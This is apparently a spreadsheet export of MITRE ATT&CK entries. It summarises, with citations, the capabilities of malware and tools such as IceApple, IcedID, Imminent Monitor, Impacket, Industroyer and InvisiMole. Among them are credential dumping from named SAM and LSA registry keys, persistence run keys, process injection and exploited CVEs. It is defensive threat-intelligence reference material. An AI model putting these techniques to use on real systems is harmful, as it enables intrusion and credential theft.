    <t>[IceApple](https://attack.mitre.org/software/S1022) can use a Base64-encoded AES key to decrypt tasking.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>relationship--753b0a84-4455-4706-babf-f9bf75e530be</t>
  </si>
  <si>
    <t>The [IceApple](https://attack.mitre.org/software/S1022) Active Directory Querier module  can perform authenticated requests against an Active Directory server.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>relationship--d682570b-068d-421e-a6b4-a93640bd34dc</t>
  </si>
  <si>
    <t xml:space="preserve">[IceApple](https://attack.mitre.org/software/S1022)'s Multi File Exfiltrator module can exfiltrate multiple files from a compromised host as an HTTP response over C2.(Citation: CrowdStrike IceApple May 2022) </t>
  </si>
  <si>
    <t>relationship--64b3a1a6-42c3-4874-a081-e620577f5cfd</t>
  </si>
  <si>
    <t>[IceApple](https://attack.mitre.org/software/S1022) can delete files and directories from targeted systems.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>relationship--4f54b318-43d1-4ae3-b6e5-912d2408dc0c</t>
  </si>
  <si>
    <t>The [IceApple](https://attack.mitre.org/software/S1022) Directory Lister module can list information about files and directories including creation time, last write time, name, and size.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>relationship--ce67a5bb-66a8-4926-ae72-64ef08040770</t>
  </si>
  <si>
    <t>[IceApple](https://attack.mitre.org/software/S1022) is an IIS post-exploitation framework, consisting of 18 modules that provide several functionalities.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>relationship--652ba0d5-1bd3-4dcb-93c5-f339ffdae886</t>
  </si>
  <si>
    <t>[IceApple](https://attack.mitre.org/software/S1022)'s Credential Dumper module can dump LSA secrets from registry keys, including: `HKLM\SECURITY\Policy\PolEKList\default`, `HKLM\SECURITY\Policy\Secrets\*\CurrVal`, and `HKLM\SECURITY\Policy\Secrets\*\OldVal`.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>relationship--21fa2533-b082-408b-857c-ad6d85a74238</t>
  </si>
  <si>
    <t>[IceApple](https://attack.mitre.org/software/S1022) .NET assemblies have used `App_Web_` in their file names to appear legitimate.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>relationship--25398304-d7db-4180-864c-e123cd2ba041</t>
  </si>
  <si>
    <t>[IceApple](https://attack.mitre.org/software/S1022) can use reflective code loading to load .NET assemblies into `MSExchangeOWAAppPool` on targeted Exchange servers.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>relationship--9d67040f-625a-49bd-aacb-48024fc7c4b2</t>
  </si>
  <si>
    <t>[IceApple](https://attack.mitre.org/software/S1022)'s Credential Dumper module can dump encrypted password hashes from SAM registry keys, including `HKLM\SAM\SAM\Domains\Account\F` and `HKLM\SAM\SAM\Domains\Account\Users\*\V`.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>relationship--e4030866-a970-4af5-9d50-b33c7751a8ba</t>
  </si>
  <si>
    <t>The [IceApple](https://attack.mitre.org/software/S1022) Result Retriever module can AES encrypt C2 responses.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>relationship--d8f14118-ba84-44b0-a0b6-ad2348e42906</t>
  </si>
  <si>
    <t>The [IceApple](https://attack.mitre.org/software/S1022) Server Variable Dumper module iterates over all server variables present for the current request and returns them to the adversary.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>relationship--ca765e99-996e-4d0f-ada0-5c44d3930404</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</si>
  <si>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</si>
  <si>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relationship--071f5618-aac7-45ca-9fb5-c863b5d6a179</t>
  </si>
  <si>
    <t>The [IceApple](https://attack.mitre.org/software/S1022) OWA credential logger can monitor for OWA authentication requests and log the credentials.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>relationship--ae64efe5-a482-418f-9be1-3a88db40f6ab</t>
  </si>
  <si>
    <t>[IceApple](https://attack.mitre.org/software/S1022) can use HTTP GET to request and pull information from C2.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>relationship--c1ed24fb-6777-4001-88b4-a284091cde64</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has used SSL and TLS in communications with C2.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>relationship--fbf2cca6-d734-49b2-a1a9-6c393b99fd91</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has used &lt;code&gt;ZwQueueApcThread&lt;/code&gt; to inject itself into remote processes.(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>relationship--a6fe230f-9e76-46a5-a235-2990009d8c4a</t>
  </si>
  <si>
    <t>14 August 2020</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</si>
  <si>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</si>
  <si>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relationship--c5e3e18d-124e-4ae2-a95c-9db8f6d53000</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) can query LDAP to identify additional users on the network to infect.(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>relationship--94229aa6-c862-48b8-9959-1e1d3c04dd5e</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has the ability to download additional modules and a configuration file from C2.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>relationship--a8484e9d-ad08-4d2c-8328-24552dd22f35</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has been executed through Word documents with malicious embedded macros.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>relationship--7b078d28-1724-474c-8668-a6d5c28ed72b</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) can inject itself into a suspended msiexec.exe process to send beacons to C2 while appearing as a normal msi application. (Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>relationship--24c80905-1afb-43fa-b1c0-e8bf2e7e87e2</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</si>
  <si>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</si>
  <si>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relationship--891f37e3-9c72-4eed-8fcc-8106dc360a97</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has utilzed encrypted binaries and base64 encoded strings.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>relationship--83e30b05-5658-4cc3-9bac-500ea852e655</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has the ability to identify Workgroup membership.(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>relationship--34a06e23-b81c-45c7-96bc-7e08d31a4a44</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has established persistence by creating a Registry run key.(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>relationship--cabd44af-9804-4f83-98e0-927719057a62</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has created a scheduled task that executes every hour to establish persistence.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>relationship--499d7aed-5889-4f40-a688-660f976dd112</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has packed and encrypted its loader module.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>relationship--ee6b93d4-71f1-4d8c-bc2d-3cbb9b30c866</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has been delivered via phishing e-mails with malicious attachments.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>relationship--b7d44225-31cf-4766-b585-debf0ed8d965</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has embedded binaries within RC4 encrypted .png files.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>relationship--8d36ae15-a2af-4c13-86f0-f657afbb4c86</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has the ability to identify the computer name and OS version on a compromised host.(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>relationship--f36f0a5d-a2a6-440f-8d6f-3fbdafb07af0</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has used obfuscated VBA string expressions.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>relationship--9968edfb-8501-4954-847d-8f873c78e023</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has used HTTPS in communications with C2.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>relationship--b82ab6ba-b590-440d-bfd1-75f18560a8b4</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has used WMI to execute binaries.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>relationship--969d588f-7357-4349-b158-2bf78704c1b4</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a remote microphone monitoring capability.(Citation: Imminent Unit42 Dec2019)(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>relationship--c068603b-bfab-4efd-92c2-01f8d696ea88</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a CommandPromptPacket and ScriptPacket module(s) for creating a remote shell and executing scripts.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>relationship--45c4d1f9-414f-4542-8272-c783f7314514</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a PasswordRecoveryPacket module for recovering browser passwords.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>relationship--14307b7b-0837-4c15-a959-0c8d24e05b6b</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has decoded malware components that are then dropped to the system.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>relationship--239cb026-369a-43f0-922c-cdc38d124430</t>
  </si>
  <si>
    <t xml:space="preserve">[Imminent Monitor](https://attack.mitre.org/software/S0434) has a feature to disable Windows Task Manager.(Citation: Imminent Unit42 Dec2019)	</t>
  </si>
  <si>
    <t>relationship--ff6d64fb-c41c-409b-91b0-e4fb9d9edba1</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has uploaded a file containing debugger logs, network information and system information to the C2.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>relationship--aac7b4ce-93ee-4feb-83da-3b2600ad75b0</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has deleted files related to its dynamic debugger feature.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>relationship--2f0fee17-1cd1-45dd-a1e0-f854c03ed064</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a dynamic debugging feature to check whether it is located in the %TEMP% directory, otherwise it copies itself there.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>relationship--e80f97df-4984-4e62-bba6-1333d4c2c977</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a dynamic debugging feature to set the file attribute to hidden.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>relationship--7393547f-0d33-4070-9569-733e15c72e73</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a keylogging module.(Citation: Imminent Unit42 Dec2019)</t>
  </si>
  <si>
    <t>relationship--28d30695-5015-431d-baa6-9e75088a2a83</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has leveraged CreateProcessW() call to execute the debugger.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>relationship--106cf74b-91d6-4348-91ae-48d1a42abb73</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has encrypted the spearphish attachments to avoid detection from email gateways; the debugger also encrypts information before sending to the C2.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>relationship--c3aa5639-a8e1-4de3-8f39-cc98593973ed</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a "Process Watcher" feature to monitor processes in case the client ever crashes or gets closed.(Citation: Imminent Unit42 Dec2019)</t>
  </si>
  <si>
    <t>relationship--4458ca35-0285-408b-9059-62c36086fd0a</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a module for performing remote desktop access.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>relationship--4151f66f-efcc-4c26-b3b6-8650c0a36258</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has the capability to run a cryptocurrency miner on the victim machine.(Citation: Imminent Unit42 Dec2019)</t>
  </si>
  <si>
    <t>relationship--8f0e7661-fa5d-47c4-84b0-44cd31b49764</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a remote webcam monitoring capability.(Citation: Imminent Unit42 Dec2019)(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>relationship--62bf12af-cf11-48e7-8963-4fdf3e23fea0</t>
  </si>
  <si>
    <t>[Impacket](https://attack.mitre.org/software/S0357) modules like GetUserSPNs can be used to get Service Principal Names (SPNs) for user accounts. The output is formatted to be compatible with cracking tools like John the Ripper and Hashcat.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>relationship--5d4113cb-f652-4214-9585-388422528960</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</si>
  <si>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</si>
  <si>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relationship--0318431e-ad44-44c7-97be-686d4efe79f4</t>
  </si>
  <si>
    <t>07 February 2019</t>
  </si>
  <si>
    <t>SecretsDump and [Mimikatz](https://attack.mitre.org/software/S0002) modules within [Impacket](https://attack.mitre.org/software/S0357) can perform credential dumping to obtain account and password information.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>relationship--de1d9450-317d-42e1-af71-8f531408e5c6</t>
  </si>
  <si>
    <t>relationship--78daa7e5-f5e5-452b-a7fd-cece272294fd</t>
  </si>
  <si>
    <t>SecretsDump and [Mimikatz](https://attack.mitre.org/software/S0002) modules within [Impacket](https://attack.mitre.org/software/S0357) can perform credential dumping to obtain account and password information from NTDS.dit.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>relationship--6d0fb103-d6f6-4259-a62f-296735020176</t>
  </si>
  <si>
    <t>[Impacket](https://attack.mitre.org/software/S0357) can be used to sniff network traffic via an interface or raw socket.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>relationship--191d6679-d6a8-42e3-b5ff-84a8d5bfb1dd</t>
  </si>
  <si>
    <t>relationship--b39c536a-55f1-485a-8235-24acb39d0be6</t>
  </si>
  <si>
    <t>[Impacket](https://attack.mitre.org/software/S0357) contains various modules emulating other service execution tools such as [PsExec](https://attack.mitre.org/software/S0029).(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>relationship--6e1e5bab-151b-4be9-9c96-5cb4c66ff540</t>
  </si>
  <si>
    <t>[Impacket](https://attack.mitre.org/software/S0357)'s wmiexec module can be used to execute commands through WMI.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>relationship--891f701a-b0d3-408a-8e2c-e9d9e727930e</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) uses a custom DoS tool that leverages CVE-2015-5374 and targets hardcoded IP addresses of Siemens SIPROTEC devices.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>relationship--db95e799-2b1b-48bc-b27e-7c7af554250b</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) has used a Trojanized version of the Windows Notepad application for an additional backdoor persistence mechanism.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>relationship--3f9b76e7-7902-44b1-b589-51f5657fff75</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604)’s data wiper module clears registry keys and overwrites both ICS configuration and Windows files.(Citation: Dragos Crashoverride 2017)</t>
  </si>
  <si>
    <t>relationship--16873550-3105-4ce5-92fc-7b8127e47b5d</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) decrypts code to connect to a remote C2 server.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>relationship--f3d0ffd9-5bda-46fd-ba44-ef1b1def9506</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) sends information about hardware profiles and previously-received commands back to the C2 server in a POST-request.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>relationship--987786d7-5f2f-4fdd-b5cb-fddadc9982c8</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604)’s data wiper component enumerates specific files on all the Windows drives.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>relationship--6832f4b5-3f36-4def-9b97-d0228da33964</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) downloads a shellcode payload from a remote C2 server and loads it into memory.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>relationship--4f90d1a5-4903-46d9-95b2-73bb118f8cb9</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) used [Tor](https://attack.mitre.org/software/S0183) nodes for C2.(Citation: Dragos Crashoverride 2017)</t>
  </si>
  <si>
    <t>relationship--c9fbbab5-c6f1-4aed-bf1f-ea7c83e4d1f2</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) uses a custom port scanner to map out a network.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>relationship--1d1cc2e5-ef43-4b36-9077-3b173e03d254</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) uses heavily obfuscated code in its Windows Notepad backdoor.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>relationship--fea9df26-2ff4-4fa4-8306-f10af6cdd7cd</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) attempts to perform an HTTP CONNECT via an internal proxy to establish a tunnel.(Citation: Dragos Crashoverride 2017)</t>
  </si>
  <si>
    <t>relationship--69a744c7-a971-4e21-b305-335801c539d1</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) has a data wiper component that enumerates keys in the Registry &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services&lt;/code&gt;.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>relationship--f6c9d3c4-2e47-4881-a376-e60791092fc5</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) can enumerate remote computers in the compromised network.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>relationship--50cf1a8b-5ed4-4155-a09d-ed65cf9c4a08</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604)’s data wiper module writes zeros into the registry keys in &lt;code&gt;SYSTEM\CurrentControlSet\Services&lt;/code&gt; to render a system inoperable.(Citation: Dragos Crashoverride 2017)</t>
  </si>
  <si>
    <t>relationship--88484d85-3c8e-4ccc-b82b-650c6c9bc825</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) collects the victim machine’s Windows GUID.(Citation: Dragos Crashoverride 2017)</t>
  </si>
  <si>
    <t>relationship--d0592d8b-cb1e-431f-a27e-1412892ca030</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604)’s 61850 payload component enumerates connected network adapters and their corresponding IP addresses.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>relationship--80e4369d-4799-4aad-918c-ae34fb7ffa17</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) can use supplied user credentials to execute processes and stop services.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>relationship--3ce056f2-7ade-4557-86a8-f0ec216730ec</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604)’s main backdoor connected to a remote C2 server using HTTPS.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>relationship--a8e426d7-d4d8-44f4-b2f4-6d552e75908b</t>
  </si>
  <si>
    <t xml:space="preserve">[Industroyer](https://attack.mitre.org/software/S0604) can use an arbitrary system service to load at system boot for persistence and replaces the ImagePath registry value of a Windows service with a new backdoor binary.(Citation: Dragos Crashoverride 2017) </t>
  </si>
  <si>
    <t>relationship--02af155a-ed26-4807-99c5-f88477a6e143</t>
  </si>
  <si>
    <t>[Industroyer2](https://attack.mitre.org/software/S1072) has the ability to cyclically enumerate running processes such as PServiceControl.exe, PService_PDD.exe, and other targets supplied through a hardcoded configuration.(Citation: Industroyer2 Mandiant April 2022)</t>
  </si>
  <si>
    <t>relationship--849c40ae-9dc7-4861-9a6c-8c03b4ffb7b5</t>
  </si>
  <si>
    <t>S0259</t>
  </si>
  <si>
    <t>InnaputRAT</t>
  </si>
  <si>
    <t>malware--c8b6cc43-ce61-42ae-87f3-a5f10526f952</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) has a command to delete files.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>relationship--553e41ba-f8e6-408c-bdbd-f46246124df6</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) enumerates directories and obtains file attributes on a system.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>relationship--60c352ec-eb4c-451a-a56e-43a9dc4ee91f</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) variants have attempted to appear legitimate by adding a new service named OfficeUpdateService.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>relationship--a7653df0-63f4-4632-b5a2-6b00aead446f</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) variants have attempted to appear legitimate by using the file names SafeApp.exe and NeutralApp.exe.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>relationship--cf29f1f0-867f-4e08-9442-d10f75ec7702</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) uses the API call ShellExecuteW for execution.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>relationship--7af9715f-b85c-4fc5-8ef8-5884c8144178</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) uses an 8-byte XOR key to obfuscate API names and other strings contained in the payload.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>relationship--549fdc30-5269-48ee-9dc8-60db8deb836a</t>
  </si>
  <si>
    <t>Some [InnaputRAT](https://attack.mitre.org/software/S0259) variants establish persistence by modifying the Registry key &lt;code&gt;HKU\&lt;SID&gt;\Software\Microsoft\Windows\CurrentVersion\Run:%appdata%\NeutralApp\NeutralApp.exe&lt;/code&gt;.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>relationship--bc7382dc-b2d0-4bd3-9e7d-f49cf17e7fc1</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) gathers volume drive information and system information.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>relationship--32e93dd8-d0df-40d8-b85f-e10e70fc0b8f</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) launches a shell to execute commands on the victim’s machine.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>relationship--03a73f0c-218f-4ebf-81d2-88e2c8e9b883</t>
  </si>
  <si>
    <t>Some [InnaputRAT](https://attack.mitre.org/software/S0259) variants create a new Windows service to establish persistence.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>relationship--c0584f8c-e358-4058-aafc-130bfb54dc88</t>
  </si>
  <si>
    <t>S0260</t>
  </si>
  <si>
    <t>InvisiMole</t>
  </si>
  <si>
    <t>malware--47afe41c-4c08-485e-b062-c3bd209a1cce</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can enumerate windows and child windows on a compromised host.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--47ba2c60-f295-4a91-bcd1-ac17292f4e7e</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) uses a variation of the XOR cipher to encrypt files before exfiltration.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>relationship--afd03a56-6d2b-4b00-895a-012f5d348898</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use zlib to compress and decompress data.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--399fbffc-1684-44ef-8002-61cfeff14383</t>
  </si>
  <si>
    <t>17 August 2020</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) uses WinRAR to compress data that is intended to be exfiltrated.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>relationship--4082e0a3-e725-4f9f-98e2-3850c8cc8df2</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can inject its code into a trusted process via the APC queue.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--37da9e7e-f366-4211-84bd-34fd9c43d681</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can record sound using input audio devices.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--9fde631f-9e22-40fe-b6bb-071bd689c8f9</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can sort and collect specific documents as well as generate a list of all files on a newly inserted drive and store them in an encrypted file.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--c87cbebf-6b1f-480d-802d-5a2004256183</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use fileless UAC bypass and create an elevated COM object to escalate privileges.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--c9412068-a35c-4be3-9945-a1f69f2f77db</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use the &lt;code&gt;ITaskService&lt;/code&gt;, &lt;code&gt;ITaskDefinition&lt;/code&gt; and &lt;code&gt;ITaskSettings&lt;/code&gt; COM interfaces to schedule a task.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--2cae8d8d-e0de-4793-9acf-d21508189bf9</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can register itself for execution and persistence via the Control Panel.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--6cef3b8e-24de-41f0-b568-531211e0268a</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</si>
  <si>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</si>
  <si>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relationship--dc0cf30b-ec44-4b5a-8c45-f93e48974a05</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has used a custom implementation of DNS tunneling to embed C2 communications in DNS requests and replies.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--9c6804dc-e1d5-43f5-97ee-7d827c9d308d</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can collect data from the system, and can monitor changes in specified directories.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>relationship--63738109-c04a-4af9-a671-636c493d7a21</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can collect jpeg files from connected MTP devices.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--077beadb-aa94-45bd-8875-d917fcd7f6b7</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</si>
  <si>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</si>
  <si>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relationship--b6a89ded-fa53-42b9-8f40-03c845123ac0</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has a command to disable routing and the Firewall on the victim’s machine.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>relationship--15489699-7ea0-473f-a4cd-5bc9e05e2104</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</si>
  <si>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</si>
  <si>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relationship--85cff8f7-2c44-4886-8b8c-efaac50d4596</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</si>
  <si>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</si>
  <si>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relationship--fa27f615-56c5-4089-bcda-657999868e53</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has exploited CVE-2007-5633 vulnerability in the speedfan.sys driver to obtain kernel mode privileges.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--64fe312b-e489-4698-9924-aeb22c056e2b</t>
  </si>
  <si>
    <t>20 July 2020</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can spread within a network via the BlueKeep (CVE-2019-0708) and EternalBlue (CVE-2017-0144) vulnerabilities in RDP and SMB respectively.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--a14c0cae-f7da-42d6-ab3c-f11746233e06</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) InvisiMole can identify proxy servers used by the victim and use them for C2 communication.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--e3e55e40-d284-4c43-9602-145d6643bc7b</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has been configured with several servers available for alternate C2 communications.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
